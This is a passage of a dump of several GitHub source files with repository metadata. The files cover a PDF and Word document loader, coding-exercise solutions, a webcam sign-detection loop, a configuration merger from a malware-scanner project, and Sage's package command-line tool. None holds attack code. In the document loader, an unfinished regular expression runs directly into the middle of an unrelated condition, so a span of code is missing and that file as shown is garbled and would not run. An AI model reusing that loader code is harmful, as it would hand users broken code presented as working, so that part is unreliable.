failedmatchnumbers)\n","repo_name":"Joenetics/N.Crassa_25-28C","sub_path":"UpstreamUniques.py","file_name":"UpstreamUniques.py","file_ext":"py","file_size_in_byte":3610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"73461962145","text":"import os\nimport re\n# import camelot\nimport tabula\nimport PyPDF2\n# import pdfplumber\nimport slate3k as slate\nimport docx\n\nfrom typing import List, Dict\nfrom tqdm.auto import tqdm\n# from pdfminer.high_level import extract_text\nfrom docx2python import docx2python\n\n\nPYPDF2_KEY = 'pypdf2'\nSLATE_KEY = 'slate'\nCAMELOT_KEY = 'camelot'\nTABULA_KEY = 'tabula'\nPLUMBER_KEY = 'plumber'\nTIKA_KEY = 'tika'\nMINER_KEY = 'miner'\nREGEX_KEY = 'regex'\nOCR_KEY = 'ocr'\nDOXC_KEY = 'doxc'\nDOXC2PYTHON_KEY = 'doxc2python'\nFIGURE_THRESHOLD = 0.1\nEPSILON = 1e-10\nREPEAT_THRESHOLD = 4\nMAX_CHAR_COUNT_FOR_FIGURE = 20\nFIGURE_RELATED_CHARS = r\"[0123456789.%-]\"\nCOMMON_UNITS = [\"kg\", \"m\", \"s\", \"h\", \"g\", \"cm\", \"mm\", \"l\", \"ml\"]\nDOCX_NAMESPACE = {'w': 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'}\n# DICT KEYS\nMETADATA_KEY = \"metadata\"\nCOMP_KEY = \"company\"\nREPORT_KEY = \"report\"\nFIGURE_KEY = \"potential_figure\"\nTABLE_KEY = \"table\"\nTABLE_ROWS_KEY = \"table\"\nTEXT_KEY = \"text\"\n\n\ndef read_txt(filename: str):\n with open(filename, 'r') as f:\n contents = f.read()\n return contents\n\n\ndef extract_footnotes_from_para(para, next_para=None):\n \"\"\"Extract footnote references and actual footnotes from a paragraph.\"\"\"\n footnotes = []\n\n footnote_refs = para._element.findall('.//w:footnoteReference', namespaces=DOCX_NAMESPACE)\n\n for ref in footnote_refs:\n footnote_id = ref.get(\"{http://schemas.openxmlformats.org/wordprocessingml/2006/main}id\")\n footnote = para.part.footnotes_part.footnote_dict[footnote_id]\n footnotes.append(footnote.text)\n\n # Check in the next paragraph for footnotes if provided\n if next_para:\n next_footnote_refs = next_para._element.findall('.//w:footnoteReference', namespaces=DOCX_NAMESPACE)\n for ref in next_footnote_refs:\n footnote_id = ref.get(\"{http://schemas.openxmlformats.org/wordprocessingml/2006/main}id\")\n footnote = next_para.part.footnotes_part.footnote_dict[footnote_id]\n footnotes.append(footnote.text)\n\n return footnotes\n\n\ndef process_footnotes(text, footnotes):\n \"\"\"Process and embed footnotes into the text.\"\"\"\n\n # Existing replacement for footnotes within brackets\n for idx, footnote in enumerate(footnotes, 1):\n text = re.sub(r\"\\[{}\\]\".format(idx), \"[{}]\".format(footnote), text)\n\n # New addition: replace footnotes appearing directly after words or at the end of sentences\n for idx, footnote in enumerate(footnotes, 1):\n # This regex will look for a number that doesn't have another number directly before\n # it (to differentiate from normal numbers within the text)\n pattern = r'(? MAX_CHAR_COUNT_FOR_FIGURE):\n return False\n\n if (char_count == 0) or (figure_char_count / (\n char_count + EPSILON) > FIGURE_THRESHOLD) or contains_common_units or contains_percentage:\n return True\n\n return False\n\n\ndef repeated_artifact_check(line, artifact_dict):\n \"\"\"Check if a line is a repeated artifact and update its count.\"\"\"\n if line in artifact_dict:\n artifact_dict[line] += 1\n if artifact_dict[line] > REPEAT_THRESHOLD:\n return True # It's a repeated artifact\n else:\n artifact_dict[line] = 1\n return False\n\n\ndef _is_empty(text):\n return len(text) == 0\n\n\nclass Loader(object):\n\n TEXT_LOADERS = {}\n TABLE_LOADERS = {}\n FIGURE_LOADERS = {}\n\n def __init__(self, file_path: str, dir_path: str):\n self._path = None # Initialize _path to None\n self.path = os.path.join(dir_path, file_path)\n\n def load_tables(self, key: str):\n\n if key not in self.TABLE_LOADERS.keys():\n raise KeyError(\n f\"The following table loaders: {[self.TABLE_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.TABLE_LOADERS[key](self.path)\n\n def load_text(self, key: str):\n\n if key not in self.TEXT_LOADERS.keys():\n raise KeyError(\n f\"The following text loaders: {[self.TEXT_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.TEXT_LOADERS[key](self.path)\n\n def load_figure(self, key: str):\n\n if key not in self.FIGURE_LOADERS.keys():\n raise KeyError(\n f\"The following figure loaders: {[self.FIGURE_LOADERS.keys()]} are supported. \"\n f\"Not {key}\"\n )\n\n return self.FIGURE_LOADERS[key](self.path)\n\n\n# TODO: Finalise, text, table, and figure loaders\nclass DOXCLoader(Loader):\n\n def __init__(self, file_path, dir_path='./data/doxc_db'):\n super().__init__(file_path=file_path, dir_path=dir_path)\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, new_path):\n if not os.path.exists(new_path):\n raise FileNotFoundError(f\"The file {new_path} does not exist.\")\n\n if not new_path.lower().endswith('.doxc'):\n raise ValueError(\"The file must be a DOXC.\")\n\n if not os.path.isfile(new_path):\n raise ValueError(\"The path must point to a file, not a directory.\")\n\n self._path = new_path\n\n def docx2python_text_loader(self) -> List[str]:\n \"\"\"\n Extract text from a .doxc file using docx2python.\n :return: A list of strings, where each string represents a block of text.\n \"\"\"\n # Extract the .doxc content\n docx_content = docx2python(self.path)\n text_content = []\n\n # docx2python represents the docx as a list of lists.\n # You navigate through these to find paragraphs.\n # Iterate through the body (ignores headers, footers)\n for docx_part in docx_content.body:\n for table in docx_part:\n for row in table:\n for cell in row:\n # strip() removes whitespace at the beginning and end of the text\n processed_text = cell.text.strip()\n if processed_text: # ignore empty strings\n text_content.append(processed_text)\n\n return text_content\n\n def doxc_text_loader(self) -> List[str]:\n \"\"\"\n Extract text from a .doxc file.\n :return: A list of strings, where each string represents a block of text.\n \"\"\"\n doc = docx.Document(self.path)\n text_content = []\n for paragraph in doc.paragraphs:\n processed_text = paragraph.text.strip()\n if not _is_empty(processed_text):\n text_content.append(processed_text)\n return text_content\n\n def doxc_fig_loader(self) -> List[Dict]:\n \"\"\"\n Extract figures from a .doxc file.\n :return: A list of dicts, each containing the title and data of a figure.\n \"\"\"\n doc = docx.Document(self.path)\n figures = []\n figure_data_group = {'title': None, 'data': []}\n previous_text = None\n\n for paragraph in doc.paragraphs:\n processed_text = paragraph.text.strip()\n if not _is_empty(processed_text):\n current_is_figure_data = is_potential_figure_data(processed_text)\n if current_is_figure_data:\n if not figure_data_group['title']:\n figure_data_group['title'] = previous_text\n figure_data_group['data'].append(processed_text)\n else:\n if figure_data_group['data']:\n figures.append(figure_data_group)\n figure_data_group = {'title': None, 'data': []}\n previous_text = processed_text\n return figures\n\n def doxc_table_loader(self) -> List[Dict]:\n \"\"\"\n Extract tables from a .doxc file.\n :return: A list of dicts, each containing the title, column headers, and rows of a table.\n \"\"\"\n doc = docx.Document(self.path)\n tables = []\n previous_text = None\n\n for table in doc.tables:\n headers = [cell.text.strip() for cell in table.rows[0].cells]\n rows = []\n\n for row in table.rows[1:]:\n row_data = {headers[j]: cell.text.strip() for j, cell in enumerate(row.cells)}\n rows.append(row_data)\n\n tables.append({\n 'title': previous_text,\n 'col_headers': headers,\n TABLE_ROWS_KEY: rows\n })\n\n # Reset the previous_text if the title was just used\n previous_text = None\n\n # Update the previous_text with the last cell's text of the last row if it's not empty\n if rows and rows[-1]:\n last_cell_text = list(rows[-1].values())[-1]\n if last_cell_text.strip():\n previous_text = last_cell_text\n\n return tables\n\n def doxc_load_all(\n self,\n ) -> dict:\n\n def _is_empty(text):\n if len(text) == 0:\n return True\n return False\n\n doc = docx.Document(self.path)\n\n result = {\n METADATA_KEY: {\n 'title': doc.core_properties.title,\n 'author': doc.core_properties.author,\n 'created': doc.core_properties.created,\n },\n TEXT_KEY: [],\n TABLE_KEY: [],\n FIGURE_KEY: [],\n }\n\n figure_data_group = {'title': None, 'data': []}\n current_is_figure_data = False\n previous_text = None\n\n artifact_dict = {}\n\n for current_elem, next_elem in tqdm(zip(doc.element.body, doc.element.body[1:] + [None])):\n\n # Paragraph\n if current_elem.tag.endswith('p'):\n\n current_para = docx.text.paragraph.Paragraph(current_elem, None)\n next_para = docx.text.paragraph.Paragraph(next_elem, None)\n\n processed_text = current_para.text.strip()\n # Ignore empty lines or repeated lines\n if _is_empty(processed_text) or repeated_artifact_check(processed_text, artifact_dict):\n continue\n try:\n next_text = next_para.text\n except AttributeError:\n next_text = None\n\n # Process footnotes\n footnotes = extract_footnotes_from_para(current_para, next_para)\n processed_text = process_footnotes(processed_text, footnotes)\n\n # Identify if the current line is potential figure data\n previous_was_figure_data = current_is_figure_data # Move the window forward\n current_is_figure_data = is_potential_figure_data(processed_text)\n next_is_figure_data = is_potential_figure_data(next_text)\n\n if current_is_figure_data:\n\n # If previous line was also figure data, they belong to the same figure\n if previous_was_figure_data:\n figure_data_group['data'].append(processed_text)\n else:\n # If a new figure starts, save the previous figure (if there was any)\n if figure_data_group['data']:\n result[FIGURE_KEY].append(figure_data_group)\n figure_data_group = {'title': None, 'data': []}\n\n # Assign the previous line as the title for the current figure\n figure_data_group['title'] = previous_text\n figure_data_group['data'].append(processed_text)\n\n elif not next_is_figure_data: # neither next or current text is figure\n # Not a figure, add to text\n result[TEXT_KEY].append(processed_text)\n else: # next text is figure, meaning that current text will be stored as title.\n pass\n\n # Handles case when text potentially interrupts figure.\n # Text is again stored in figure_data_group['data'].\n if previous_was_figure_data and next_is_figure_data:\n current_is_figure_data = True\n\n # only change previous text when current para is not empty or repeated string.\n previous_text = processed_text\n\n # Table\n elif current_elem.tag.endswith('tbl'):\n table_index = [tbl._element for tbl in doc.tables].index(current_elem)\n table = doc.tables[table_index]\n\n headers = [cell.text.strip() for cell in table.rows[0].cells]\n\n rows = []\n for row in table.rows[1:]:\n row_data = {headers[j]: cell.text.strip() for j, cell in enumerate(row.cells)}\n rows.append(row_data)\n\n result[TABLE_KEY].append({\n 'title': previous_text,\n 'col_headers': headers,\n TABLE_ROWS_KEY: rows\n })\n else:\n print(f\"Ignoring {current_elem.tag}.\")\n\n return result\n\n TEXT_LOADERS = {\n DOXC_KEY: doxc_text_loader,\n DOXC2PYTHON_KEY: docx2python_text_loader,\n }\n TABLE_LOADERS = {\n DOXC_KEY: doxc_table_loader,\n }\n FIGURE_LOADERS = {\n DOXC_KEY: doxc_fig_loader,\n }\n\n\nclass PDFLoader(Loader):\n\n def __init__(self, file_path, dir_path='./data/pdf_db'):\n super().__init__(file_path=file_path, dir_path=dir_path)\n\n @property\n def path(self):\n return self._path\n\n @path.setter\n def path(self, new_path):\n if not os.path.exists(new_path):\n raise FileNotFoundError(f\"The file {new_path} does not exist.\")\n\n if not new_path.lower().endswith('.pdf'):\n raise ValueError(\"The file must be a PDF.\")\n\n if not os.path.isfile(new_path):\n raise ValueError(\"The path must point to a file, not a directory.\")\n\n self._path = new_path\n\n @staticmethod\n def pypdf2_text_loader(file_path: str) -> List[str]:\n \"\"\"\n Extract text from a PDF file using PyPDF2.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents the text content of a page.\n \"\"\"\n with open(file_path, 'rb') as f:\n reader = PyPDF2.PdfFileReader(f)\n text_content = []\n for page_num in range(reader.getNumPages()):\n page = reader.getPage(page_num)\n text_content.append(page.extract_text())\n return text_content\n\n # @staticmethod\n # def pdfminer_text_loader(file_path: str) -> List[str]:\n # \"\"\"\n # Extract text from a PDF file using pdfminer.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents a line of text.\n # \"\"\"\n # text_content = extract_text(file_path)\n # return text_content.split('\\n') # Splitting by newline to get a list of lines\n\n @staticmethod\n def slate_text_loader(file_path) -> List[str]:\n \"\"\"\n Extract text from a PDF file using slate.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents the text content of a page.\n \"\"\"\n with open(file_path, 'rb') as f:\n doc = slate.PDF(f)\n text_content = [page for page in doc]\n # You would need additional logic here to separate tables from text\n return text_content\n\n @staticmethod\n def regex_table_loader(file_path) -> List[str]:\n \"\"\"\n Extract tables from a PDF file using regular expressions.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents a detected table row.\n \"\"\"\n with open(file_path, 'r', encoding='utf-8') as f:\n text_content = f.read()\n\n # This is a very simplistic example and may need to be adjusted\n # to suit the actual format of your tables.\n tables = re.findall(r'(\\d+ \\d+ \\d+)', text_content)\n return tables\n\n # @staticmethod\n # def pdfplumber_text_loader(file_path) -> List[str]:\n # \"\"\"\n # Extract text from a PDF file using pdfplumber.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents the text content of a page.\n # \"\"\"\n # with pdfplumber.open(file_path) as pdf:\n # text_content = [page.extract_text() for page in pdf.pages]\n # return text_content\n\n # @staticmethod\n # def pdfplumber_table_loader(file_path) -> List[str]:\n # \"\"\"\n # Extract tables from a PDF file using pdfplumber.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of tables, where each table is represented as a list of rows,\n # and each row is a list of strings.\n # \"\"\"\n # with pdfplumber.open(file_path) as pdf:\n # tables = []\n # for page in pdf.pages:\n # page_tables = page.extract_tables()\n # tables.extend(page_tables)\n #\n # # Convert the tables to list of strings\n # result = []\n # for table in tables:\n # for row in table:\n # result.append(' '.join(row))\n # return result\n\n @staticmethod\n def pypdf2_table_loader(file_path) -> List[str]:\n \"\"\"\n Extract text and tables from a PDF file using an enhanced version of PyPDF2.\n\n :param file_path: The path to the PDF file.\n :return: A list of pages, where each page is represented as a list of strings.\n Strings represent either lines of text or detected table rows.\n \"\"\"\n def enhanced_text_analysis(text):\n # Implement custom logic to analyze and extract tables or structured data\n # This could involve regular expressions, heuristics, or machine learning models\n\n # For example, a simple heuristic might be to look for lines of text that are\n # formatted like table rows, perhaps with data separated by spaces or other delimiters\n lines = text.split('\\n')\n tables = []\n current_table = []\n for line in lines:\n if is_table_row(line): # You need to define is_table_row function\n current_table.append(line)\n elif current_table:\n tables.append(current_table)\n current_table = []\n if current_table:\n tables.append(current_table)\n\n return tables\n\n def is_table_row(line):\n # Define your own logic to determine if a line of text represents a table row\n # This is a simplistic example and might need to be significantly expanded\n # depending on your PDFs' content and structure\n if len(line.split()) > 1: # If the line has multiple words or numbers, consider it a table row\n return True\n return False\n\n with open(file_path, 'rb') as f:\n reader = PyPDF2.PdfFileReader(f)\n text_content = []\n for page_num in range(reader.getNumPages()):\n page = reader.getPage(page_num)\n text_content.append(enhanced_text_analysis(page.extract_text()))\n\n # Convert the tables to list of strings\n result = []\n for page_content in text_content:\n for item in page_content:\n if isinstance(item, list): # If the item is a table (list of lists)\n for row in item:\n result.append(' '.join(row))\n else:\n result.append(item)\n return result\n\n # @staticmethod\n # def camelot_table_loader(file_path: str) -> List[str]:\n # \"\"\"\n # Extract tables from a PDF file using Camelot.\n #\n # :param file_path: The path to the PDF file.\n # :return: A list of strings, where each string represents a table row.\n # \"\"\"\n # tables = camelot.read_pdf(file_path, pages='all', flavor='stream')\n # result = []\n # for table in tables:\n # df = table.df\n # for index, row in df.iterrows():\n # result.append(' '.join(row))\n # return result\n\n @staticmethod\n def tabula_table_loader(file_path: str) -> List[str]:\n \"\"\"\n Extract tables from a PDF file using Tabula.\n\n :param file_path: The path to the PDF file.\n :return: A list of strings, where each string represents a table row.\n \"\"\"\n dfs = tabula.read_pdf(file_path, pages='all', multiple_tables=True)\n result = []\n for df in dfs:\n for index, row in df.iterrows():\n result.append(' '.join(row.astype(str)))\n return result\n\n @staticmethod\n def ocr_loader(file_path) -> List[str]:\n # TODO: Implement OCR solution using (for instance) pytesseract and cv2\n raise NotImplementedError\n\n TEXT_LOADERS = {\n PYPDF2_KEY: pypdf2_text_loader,\n SLATE_KEY: slate_text_loader,\n # PLUMBER_KEY: pdfplumber_text_loader,\n # MINER_KEY: pdfminer_text_loader,\n }\n\n # TODO: Consider LayoutLM (by Microsoft)\n TABLE_LOADERS = {\n # CAMELOT_KEY: camelot_table_loader,\n TABULA_KEY: tabula_table_loader,\n PYPDF2_KEY: pypdf2_table_loader,\n # PLUMBER_KEY: pdfplumber_table_loader,\n REGEX_KEY: regex_table_loader,\n OCR_KEY: ocr_loader,\n }\n","repo_name":"krystofmincevey/eyalytics","sub_path":"src/utils/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":22652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"13831812331","text":"# happy number\r\n\r\ndef num2list(num):\r\n return [x for x in str(num)]\r\n \r\ndef is_happy_helper(n): # returns the sum of all digits to the second power\r\n lst = num2list(n)\r\n num = 0\r\n for val in lst:\r\n num += (int(val) ** 2)\r\n return num\r\n \r\n\r\ndef is_happy(n: int) -> bool:\r\n count = 0\r\n while n != 1 and count <= 990: # 990 recursion limit\r\n count += 1\r\n n = is_happy_helper(n)\r\n if count >= 989: # checks if recursion limit is hit\r\n return False\r\n return True\r\n\r\n \r\n\r\nprint(is_happy(19)) # true\r\nprint(is_happy(2)) # false \r\n\r\n\r\n# longest common prefix\r\ndef longest_common_prefix(strs: [str]) -> str:\r\n if len(strs) == 1:\r\n return strs[0]\r\n longest = \"\"\r\n strs.sort(key = len)\r\n for index, char in enumerate(strs[0]):\r\n # toAdd = True\r\n for word in strs[1:]:\r\n if word[index] != char:\r\n # toAdd = False\r\n # break\r\n return longest # we return longest here because it's a prefix. we don't care about the rest. \r\n # if we did care about the rest we would add the comments instead\r\n longest += char\r\n # if toAdd:\r\n # longest += char\r\n return longest\r\n\r\nprint(longest_common_prefix([\"flow\", \"flower\", \"floor\"]))\r\n\r\n\r\n\r\n","repo_name":"Arellano-Jann/techwise","sub_path":"assignment275/275.py","file_name":"275.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31403694033","text":"\"\"\"\nMain program to run the detection\n\"\"\"\n\nfrom argparse import ArgumentParser\nimport cv2\nimport numpy as np\nfrom model import MyModel\n\nmy_model = MyModel(n_layer=6, path=\"augment_x64_0_best.ckpt\")\n\ndef main():\n\n cap = cv2.VideoCapture(0)\n\n while cap.isOpened():\n success, img = cap.read()\n\n if not success:\n print(\"Ignoring empty camera frame.\")\n continue\n\n pred = my_model.pred(img)\n\n # 使用各種字體\n cv2.putText(img, pred, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 1, cv2.LINE_AA)\n\n cv2.imshow('camera', img)\n \n # press \"q\" to leave\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"YuTing-Fang1999/Traffic-Sign","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"23335972379","text":"#coding:utf-8\n\n#chain = \"abcdefghijklmnopqrstuvwxyz\"\n#for eachChar in chain:\n# print(eachChar)\n\nindex = -1\ndef getCommand(msg, cmd):\n global index\n chain = str(cmd)+\" \"\n index = msg.find(chain, 1, len(chain) + 1)\n if index != -1:\n return 1\n return 0\n\nmsg = str(input(\"=> \"))\n\nprint(getCommand(msg, \"echo\"))\n","repo_name":"matdubuisson/informatic","sub_path":"Python/EXAMPLE/char.py","file_name":"char.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"28599909681","text":"import sys\nfrom argparse import Namespace\nfrom configparser import ConfigParser\nfrom types import SimpleNamespace\nfrom typing import Any, Type, List, Dict, Optional\n\nfrom .cli_parser import CliCanonicalValueExtractor, get_cli_values, parser\nfrom .config_items import ConfigItemDefinition, \\\n AlwaysInvalidExtractor, CanonicalValueExtractorInterface, not_set_token, \\\n get_config_map_for_subcommand\nfrom .ini_parser import load_ini, get_ini_value_extractor\n\n\nclass Config(SimpleNamespace):\n\n def __init__(\n self,\n definitions,\n subcommand,\n ini_path: Optional[str] = None\n ):\n super().__init__()\n self.__definitions = definitions\n self.subcommand = subcommand\n self.ini_path = ini_path\n self.trailing_arguments = None\n\n def values(self) -> Dict[str, Any]:\n result: Dict[str, Any] = dict()\n for prop, value in vars(self).items():\n if (prop.startswith('_') or callable(value) or\n isinstance(value, classmethod)):\n continue\n result[prop] = value\n return result\n\n def get(self, property_name) -> Any:\n return getattr(self, property_name)\n\n def define(self, property_name) -> ConfigItemDefinition:\n return self.__definitions[property_name]\n\n def has_ini_file(self) -> bool:\n return self.ini_path is not None\n\n\n__instance: Optional[Config] = None\n__ini_path: Optional[str] = None\n__ini_values: Optional[ConfigParser] = None\n__cli_values: Optional[Namespace] = None\n\nvalue_extractors: List = []\n\n\ndef create_config_object(definitions: Dict[str, ConfigItemDefinition],\n trailing_arguments: List[str], *ordered_sources):\n if len(ordered_sources) < 1:\n raise ValueError(\"At least one configuration source must be passed in\")\n target = Config(definitions, __cli_values.subcommand)\n for source in ordered_sources:\n # if an appropriate extractor isn't found, an exception will be thrown\n extractor_class: Type[\n CanonicalValueExtractorInterface] = AlwaysInvalidExtractor\n for extractor in value_extractors:\n if extractor.is_valid_source(source):\n extractor_class = extractor\n break\n # extract all values from the source and\n # conditionally update the config\n for item_definition in definitions.values():\n new_value = (extractor_class\n .get_canonical_value(item_definition, source))\n\n # later values always replace previous values\n if new_value is not not_set_token:\n setattr(target, item_definition.property_name, new_value)\n elif not hasattr(target, item_definition.property_name):\n default = item_definition.default\n if item_definition.has_separator() and \\\n isinstance(default, str):\n default = default.split(item_definition.meta.separator)\n setattr(target, item_definition.property_name,\n default)\n target.trailing_arguments = trailing_arguments\n return target\n\n\ndef load_config():\n global __instance\n global __ini_values\n global __cli_values\n if not __instance:\n __cli_values, trailing_arguments = get_cli_values()\n if not __cli_values.subcommand:\n parser.print_help()\n sys.exit()\n __ini_values, __ini_path = load_ini(__cli_values)\n\n value_extractors.append(get_ini_value_extractor(__cli_values))\n value_extractors.append(CliCanonicalValueExtractor())\n\n __instance = create_config_object(\n get_config_map_for_subcommand(__cli_values.subcommand),\n trailing_arguments,\n __ini_values,\n __cli_values)\n __instance.ini_path = __ini_path\n return __instance\n","repo_name":"wpelucas/malware-scanner","sub_path":"wordfence/cli/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6778825928","text":"import os\nimport sys\nimport logging\nlog = logging.getLogger()\n\n\n# Note that argparse is not part of Python 2.6, so we bundle it\ntry:\n import argparse\nexcept ImportError:\n from sage_bootstrap.compat import argparse\n\nfrom sage_bootstrap.app import Application\n\n\ndescription = \\\n\"\"\"\nSage Bootstrap Library\n\"\"\"\n\n\nepilog = \\\n\"\"\"\nThe individual subcommands have their own detailed help, for example\nrun \"sage --package config -h\" to see the help on the config option.\n\"\"\"\n\n\nepilog_config = \\\n\"\"\"\nPrint the configuration\n\nEXAMPLE:\n\n $ sage --package config\n Configuration:\n * log = info\n * interactive = True\n\"\"\"\n\n\nepilog_list = \\\n\"\"\"\nPrint a list of all available packages\n\nEXAMPLE:\n\n $ sage --package list | sort\n 4ti2\n arb\n atlas\n autotools\n [...]\n zn_poly\n\"\"\"\n\n\nepilog_name = \\\n\"\"\"\nFind the package name given a tarball filename\n \nEXAMPLE:\n\n $ sage --package name pari-2.8-1564-gdeac36e.tar.gz\n pari\n\"\"\"\n\n\nepilog_tarball = \\\n\"\"\"\nFind the tarball filename given a package name\n \nEXAMPLE:\n\n $ sage --package tarball pari\n pari-2.8-1564-gdeac36e.tar.gz\n\"\"\"\n\n\nepilog_apropos = \\\n\"\"\"\nFind up to 5 package names that are close to the given name\n\nEXAMPLE:\n\n $ sage --package apropos python\n Did you mean: cython, ipython, python2, python3, patch?\n\"\"\"\n \n\nepilog_update = \\\n\"\"\"\nUpdate a package. This modifies the Sage sources. \n \nEXAMPLE:\n\n $ sage --package update pari 2015 --url=http://localhost/pari/tarball.tgz\n\"\"\"\n\n\nepilog_download = \\\n\"\"\"\nDownload the tarball for a package and print the filename to stdout\n \nEXAMPLE:\n\n $ sage --package download pari\n Using cached file /home/vbraun/Code/sage.git/upstream/pari-2.8-2044-g89b0f1e.tar.gz\n /home/vbraun/Code/sage.git/upstream/pari-2.8-2044-g89b0f1e.tar.gz\n\"\"\"\n\n\nepilog_fix_checksum = \\\n\"\"\"\nFix the checksum of a package\n \nEXAMPLE:\n\n $ sage --package fix-checksum pari\n Updating checksum of pari-2.8-2044-g89b0f1e.tar.gz\n\"\"\"\n\nepilog_create = \\\n\"\"\"\nCreate new package, or overwrite existing package\n \nEXAMPLE:\n\n $ sage --package create foo --version=3.14 --tarball=Foo-VERSION.tar.bz2 --type=standard\n Creating new package \"foo\"\n\"\"\"\n\n\ndef make_parser():\n \"\"\"\n The main commandline argument parser\n \"\"\"\n parser = argparse.ArgumentParser(\n description=description, epilog=epilog,\n prog='sage --package',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument('--log', dest='log', default=None,\n help='one of [DEBUG, INFO, ERROR, WARNING, CRITICAL]')\n subparsers = parser.add_subparsers(dest='subcommand')\n\n parser_config = subparsers.add_parser(\n 'config', epilog=epilog_config,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Print the configuration')\n\n parser_list = subparsers.add_parser(\n 'list', epilog=epilog_list,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Print a list of all available packages')\n\n parser_name = subparsers.add_parser(\n 'name', epilog=epilog_name,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find the package name given a tarball filename')\n parser_name.add_argument('tarball_filename', type=str, help='Tarball filename')\n\n parser_tarball = subparsers.add_parser(\n 'tarball', epilog=epilog_tarball,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find the tarball filename given a package name')\n parser_tarball.add_argument('package_name', type=str, help='Package name')\n \n parser_apropos = subparsers.add_parser(\n 'apropos', epilog=epilog_apropos,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Find up to 5 package names that are close to the given name')\n parser_apropos.add_argument(\n 'incorrect_name', type=str, \n help='Fuzzy name to search for')\n\n parser_update = subparsers.add_parser(\n 'update', epilog=epilog_update,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Update a package. This modifies the Sage sources.')\n parser_update.add_argument(\n 'package_name', type=str, help='Package name')\n parser_update.add_argument(\n 'new_version', type=str, help='New version')\n parser_update.add_argument(\n '--url', type=str, default=None, help='Download URL')\n\n parser_download = subparsers.add_parser(\n 'download', epilog=epilog_download,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Download tarball')\n parser_download.add_argument(\n 'package_name', type=str, help='Package name')\n \n parser_fix_checksum = subparsers.add_parser(\n 'fix-checksum', epilog=epilog_fix_checksum,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Fix the checksum of package.')\n parser_fix_checksum.add_argument(\n 'package_name', nargs='?', default=None, type=str,\n help='Package name. Default: fix all packages.')\n \n parser_create = subparsers.add_parser(\n 'create', epilog=epilog_create,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n help='Create or overwrite package.')\n parser_create.add_argument(\n 'package_name', nargs='?', default=None, type=str,\n help='Package name. Default: fix all packages.')\n parser_create.add_argument(\n '--version', type=str, default=None, help='Package version')\n parser_create.add_argument(\n '--tarball', type=str, default=None, help='Tarball filename pattern, e.g. Foo-VERSION.tar.bz2')\n parser_create.add_argument(\n '--type', type=str, default=None, help='Package type')\n\n return parser\n\n\n\ndef run():\n parser = make_parser()\n if len(sys.argv) == 1:\n parser.print_help()\n return\n args = parser.parse_args(sys.argv[1:])\n if args.log is not None:\n level = getattr(logging, args.log.upper())\n log.setLevel(level=level)\n log.debug('Commandline arguments: %s', args)\n app = Application()\n if args.subcommand == 'config':\n app.config()\n elif args.subcommand == 'list':\n app.list()\n elif args.subcommand == 'name':\n app.name(args.tarball_filename)\n elif args.subcommand == 'tarball':\n app.tarball(args.package_name)\n elif args.subcommand == 'apropos':\n app.apropos(args.incorrect_name)\n elif args.subcommand == 'update':\n app.update(args.package_name, args.new_version, url=args.url)\n elif args.subcommand == 'download':\n app.download(args.package_name)\n elif args.subcommand == 'create':\n app.create(args.package_name, args.version, args.tarball, args.type)\n elif args.subcommand == 'fix-checksum':\n if args.package_name is None:\n app.fix_all_checksums()\n else:\n app.fix_checksum(args.package_name)\n else:\n raise RuntimeError('unknown subcommand: {0}'.format(args))\n\n \nif __name__ == '__main__':\n run()\n","repo_name":"BrentBaccala/sage","sub_path":"build/sage_bootstrap/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":7044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
